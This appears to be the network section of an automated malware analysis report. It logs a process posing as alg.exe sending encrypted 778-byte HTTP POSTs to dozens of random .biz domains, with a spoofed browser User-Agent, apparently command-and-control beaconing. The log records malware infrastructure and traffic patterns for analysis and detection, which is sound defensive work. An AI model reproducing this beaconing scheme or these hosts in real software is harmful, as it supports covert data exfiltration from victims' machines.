User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:57.068835020 CET | 778 | OUT | Data Raw: 9b 1d 95 a0 d8 18 d1 ae fe 02 00 00 b5 65 82 e5 50 64 c4 7c 89 8a 1d 1a 60 af 87 e7 ec 8d 9f 1e fb a3 3c be b3 da 31 cd bc 3c 05 f9 1f 19 9b f9 86 33 8b 45 9d f1 30 af 6e 49 aa 35 ca d3 08 82 29 4f e9 a5 16 7d 77 f9 5b 49 a3 25 c9 9f ee 5c 36 82
Data Ascii: ePd|`<1<3E0nI5)O}w[I%\6{B(=,&s&/EF6>L)[aky3%h[&+yL7sJiCuO'D<;0h5:~(,DoE_'@t_ mHsL242]r]gZa#<


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.5 | 50054 | 72.52.178.23 | 80 | 2636 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:57.912318945 CET | 357 | OUT | POST /klxaypeiwoubq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wxgzshna.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:57.912353992 CET | 778 | OUT | Data Raw: 5c 48 be 5d 6a b1 05 42 fe 02 00 00 23 67 22 d8 c3 81 3e 08 64 1f 3e 5d a8 0a 0f 88 a0 f5 ec 44 97 94 31 a0 ef f3 c5 fc 6a c4 25 23 a9 61 d9 3b 80 ce 7c e9 39 0f fb 6a 34 c7 fe 7a 35 e3 46 f4 9b d5 45 2f 72 79 f7 b1 58 60 6b 46 e5 4d fc 08 9f 0c
Data Ascii: \H]jB#g">d>]D1j%#a;|9j4z5FE/ryX`kFMmXmk~h%Q[d0/M<CQ?lRm9zu!I:+M)pm^5cs~"l-&`:*lulfpZ-1[YDj']sw


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.5 | 50055 | 44.221.84.105 | 80 | 2636 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:51:58.748231888 CET | 355 | OUT | POST /mcduyucxmuwka HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zrlssa.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:51:58.748266935 CET | 778 | OUT | Data Raw: ec a8 2c 25 9e 35 da 5a fe 02 00 00 4d 6e 10 57 c0 56 36 3a 19 30 03 2a c3 a8 c7 a0 6b 50 b9 ef 48 94 7a 5c 83 96 a9 74 cc b8 4c ba 7f b9 f5 34 ac 3a 72 94 a6 f3 f1 71 81 83 0e 82 eb 0d 8b 94 51 ff 1c b3 9e be 32 13 c3 8b 7f 54 15 6c 1c 73 d0 b9
Data Ascii: ,%5ZMnWV6:0*kPHz\tL4:rqQ2TlsRz3]wbP:ku=4n5@)z:v(>o;=,'HB}g{fX<Zpv:#R)7d%xK/+9D)cH_4a,R"jP7
Oct 28, 2024 16:51:59.424982071 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:51:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8cdec651ec65576248b11ede47545667|155.94.241.188|1730130719|1730130719|0|1|0; path=/; domain=.zrlssa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  80192.168.2.55005618.141.10.107802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.445733070 CET353OUTPOST /hrucffqs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.445733070 CET778OUTData Raw: e7 c6 a5 42 b2 b7 18 58 fe 02 00 00 09 a7 8a 1f 3a 5c 7e 29 24 8d eb 05 f8 3c 62 b3 51 83 7b 16 d9 27 d5 c8 f7 2e 85 a3 53 1a 3a dc 8c e9 36 e6 bf ed 73 24 ba ea 36 eb a2 2c 95 ee 61 2b fe d1 af 6e 10 ae 8c 85 3e c6 78 50 53 9f 02 d0 cd b3 9e d6
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: BX:\~)$<bQ{'.S:6s$6,a+n>xPSz:Y/(bV)8h|V&HO'wQ<@KC&&~WH8fi?lW)x+T%kZ&6yK8#`##XsR;R;x,(UA:E"?_]/
Oct 28, 2024 16:52:00.889324903 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=55909511bd39f7be112632d57893cecb|155.94.241.188|1730130720|1730130720|0|1|0; path=/; domain=.jlqltsjvh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.5 | 50057 | 18.208.156.248 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:00.910176039 CET | 343 | OUT | POST /rc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: xyrgy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.910197973 CET778OUTData Raw: a1 2b 80 53 56 0f 0e 41 fe 02 00 00 36 d4 c5 80 21 41 5e e6 fd af 90 d4 06 13 31 6b 70 bc dc 80 9b f6 80 de 9a 2a c1 11 c9 da 5b f5 ae fd 12 a6 65 40 3b 45 ab 8f fb c5 b7 12 0f 94 4a 1e 04 dd 98 c1 db 04 e0 86 3c be eb 26 58 ee 12 16 48 79 dc 25
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: +SVA6!A^1kp*[e@;EJ<&XHy%b:=HWKPQC#7"[7Bh9*Gc+N?;X5Fr*PY!/YPyA?S>qJzbv_ghcm.]tMCi_38gZx4J$eSM&v
Oct 28, 2024 16:52:01.563652992 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=da0c287f76832482c945062ca3933cf3|155.94.241.188|1730130721|1730130721|0|1|0; path=/; domain=.xyrgy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.5 | 50058 | 172.234.222.138 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:01.585447073 CET | 349 | OUT | POST /lmpk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.585484982 CET778OUTData Raw: 33 bc f3 85 18 b9 3d 28 fe 02 00 00 70 5b 37 72 a5 41 c9 f8 29 a3 01 99 62 fb 79 14 9f f4 55 ca a1 56 b9 52 31 93 7c 6f dd f5 bd 0c b2 ce 51 bc 0f 47 5d c6 32 76 72 32 6f 09 8a 70 3b 14 62 b6 cc 0c 24 52 cb 6f c5 c7 f0 34 5c 40 3c 55 99 e6 15 91
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 3=(p[7rA)byUVR1|oQG]2vr2op;b$Ro4\@<U8Ml-x;|]p"KSd[>9&;'O`Su'h2`h]6:p$'fWo\gW_"$t]X5P*R>*R69^GTAaMM|C2J2]rb6


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.5 | 50059 | 172.234.222.138 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:02.246095896 CET | 347 | OUT | POST /dp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:02.246130943 CET778OUTData Raw: 91 87 e4 c3 30 f8 e5 04 fe 02 00 00 a6 c3 35 0d 18 84 16 7b 1b a3 6a 38 21 ad 9f c7 f5 b5 14 34 0c 3a 74 20 76 56 d2 a4 2e 80 03 40 b9 71 fe 3b 61 b9 46 dd 1b 37 4c 05 0c d0 17 50 fd a9 f2 b4 dd e5 ac e1 e5 dc 7a f1 94 9f f6 50 71 c4 73 d2 cb 25
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 05{j8!4:t vV.@q;aF7LPzPqs%O+KM4%xZPOXa_'`8"qLBmmpz_c?D-(X/en0G)RWwt+:R#.!E_Sa7}1/Zk


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.5 | 50060 | 54.244.188.177 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:03.162542105 CET | 348 | OUT | POST /euqwv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: kvbjaur.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:03.162570953 CET778OUTData Raw: 24 e4 1a 8a af d3 e3 ad fe 02 00 00 83 e9 06 4e d4 57 f4 dc 18 c7 8e c8 b2 fa 2f 76 67 2a 3c c1 cf 0e dc 34 14 bf 2d e5 93 2d 3e b9 a8 d2 73 60 ac 2c 6a a5 ae 48 be 7a 15 6f ba 0d 58 50 03 29 30 88 d1 e9 01 8a 59 49 b2 e4 6e dc d2 fb 69 3a b0 15
Oct 28, 2024 16:52:04.176521063 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bf635b8cb8997ff95c6099820b73627f|155.94.241.188|1730130723|1730130723|0|1|0; path=/; domain=.kvbjaur.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.5 | 50061 | 44.221.84.105 | 80 | 2636 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:04.200233936 CET | 356 | OUT | POST /tlbvmelxpwjipdp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uphca.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:04.200253963 CET | 778 | OUT | Data Raw: 7e 19 c3 86 67 f6 a6 ad fe 02 00 00 f1 45 92 69 1c ea 5a 44 80 ce c1 34 0b 26 a9 6b 92 c6 d8 d6 29 b8 4b f3 e7 7b 81 51 eb 29 66 c8 d7 f4 95 a7 ea 25 0d d8 43 5e ab 52 f2 35 ec 80 16 f9 84 fa bc 5f e0 eb f4 d3 c6 59 a6 7a 34 f4 4d 05 38 88 9a 68
Oct 28, 2024 16:52:04.877710104 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a2a6f6f45defcacd9251f0eb07875faf|155.94.241.188|1730130724|1730130724|0|1|0; path=/; domain=.uphca.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.5 | 50062 | 34.211.97.45 | 80 | 2636 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:04.902137995 CET | 351 | OUT | POST /pffvqbu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fjumtfnz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:04.902153969 CET | 778 | OUT | Data Raw: 76 3a 74 a4 31 21 bb 1a fe 02 00 00 d7 24 6f 37 38 09 c2 b9 89 c7 31 6e b8 12 b4 71 98 75 37 4d 27 0f d7 10 00 01 38 54 65 af f9 61 9b 53 b9 47 68 02 a6 ac 50 1f 91 ac 9d ae 6f b1 41 d5 64 90 df dc dc 67 94 80 cb 9d 91 50 ce a1 9f e1 cc 87 58 d1
Oct 28, 2024 16:52:05.731158018 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3f96aa0f2c261112bd17a11963e9cbfc|155.94.241.188|1730130725|1730130725|0|1|0; path=/; domain=.fjumtfnz.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.5 | 50063 | 34.211.97.45 | 80 | 2636 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:05.856065035 CET | 355 | OUT | POST /vebfxvjlhsxr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hlzfuyy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:05.856118917 CET | 778 | OUT | Data Raw: 04 83 df 36 1d 12 e4 4b fe 02 00 00 53 a2 1a 70 45 9c 68 d2 6c 40 a8 0b 1d 25 47 de 3d 04 72 0d 41 2c 99 32 84 ad 13 f8 f9 5c a4 bf 54 46 19 5c 68 8e e2 f6 bb da 84 46 2a c7 d1 2e 48 5b e1 c7 fb 86 80 cc 6a d7 14 02 d5 a0 c1 85 c0 8b 7e cb e1 88
Oct 28, 2024 16:52:06.679814100 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=11bcfdadd795d4820c7ac57c1dcb87fa|155.94.241.188|1730130726|1730130726|0|1|0; path=/; domain=.hlzfuyy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.5 | 50064 | 34.246.200.160 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:06.887774944 CET | 347 | OUT | POST /luseoc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: rffxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:06.887804985 CET | 778 | OUT | Data Raw: c5 61 c8 52 24 49 3a b9 fe 02 00 00 6b 67 ed 81 3e e5 d7 cc ab 8f 8d cb 56 eb 43 7f dc 43 1c b7 c4 59 72 a3 be c0 94 e4 21 d5 2f eb 7a 13 f4 8b cc 7d 62 4d bd fd b2 48 d7 c9 6c 98 77 97 bd 4b 9e 02 e4 e1 66 3b fc fc 9a 65 2c ca ad a2 e0 fd 64 ca
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: aR$I:kg>VCCYr!/z}bMHlwKf;e,d|a[B(|GXgtRr3Q09f\AQ<wlK~7l<+!/EOdGJnPO^yC5+<k{@
Oct 28, 2024 16:52:07.864963055 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=1e9440d992cbd4b414ef41f58da5c78b|155.94.241.188|1730130727|1730130727|0|1|0; path=/; domain=.rffxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.5 | 50065 | 18.246.231.120 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:07.893467903 CET | 351 | OUT | POST /ngujcsu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: cikivjto.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:07.893503904 CET | 778 | OUT | Data Raw: bb 1e 36 99 1c 7f c4 1a fe 02 00 00 57 04 6c fc 05 52 a8 21 8f d9 14 57 cd 1b 25 44 a3 29 ea 81 bd d8 a8 12 d8 1d 87 80 63 43 a2 9c 4c 98 11 7b 00 94 d4 b2 33 bd 93 9d 40 15 92 9e f1 d6 3a 5b d3 7c 7a 44 13 39 b0 e8 75 b9 d0 e0 96 1f 8c 2f ad af
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 6WlR!W%D)cCL{3@:[|zD9u/ME0*o5X>/4n b#z2X9?-{Qj9*d0rG,&DRhzQ~=LL8#;rB-l& 4_;NR'
Oct 28, 2024 16:52:08.790822983 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=5d72ff8c7be6b9a0f5d7f9d49e9311a9|155.94.241.188|1730130728|1730130728|0|1|0; path=/; domain=.cikivjto.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.5 | 50066 | 47.129.31.212 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:08.813956976 CET | 355 | OUT | POST /iljbyhyeqa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: qncdaagct.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:08.813987017 CET | 778 | OUT | Data Raw: 7d 2c 24 20 b1 dc 74 56 fe 02 00 00 0c 0e 86 87 f1 af ec 37 e6 13 61 75 ed 8b f1 65 47 cb 7b 45 cb 6e 21 dc c2 88 84 ca ae e6 65 5f 5e ad 4a 70 32 eb 37 93 e6 b9 b2 2c a9 98 94 87 db bb bc dc f7 7c 17 7c 47 d9 68 52 a0 d2 1b aa 3e be ce 23 d1 89
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: },$ tV7aueG{En!e_^Jp27,||GhR>#DC 8S2zZ:~kOJ*8&W_@b{r1O]Eh0nFC-12m6)=Sa\3T0`
Oct 28, 2024 16:52:10.247664928 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=cb34769752192bd60357b93d9929a8d4|155.94.241.188|1730130729|1730130729|0|1|0; path=/; domain=.qncdaagct.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
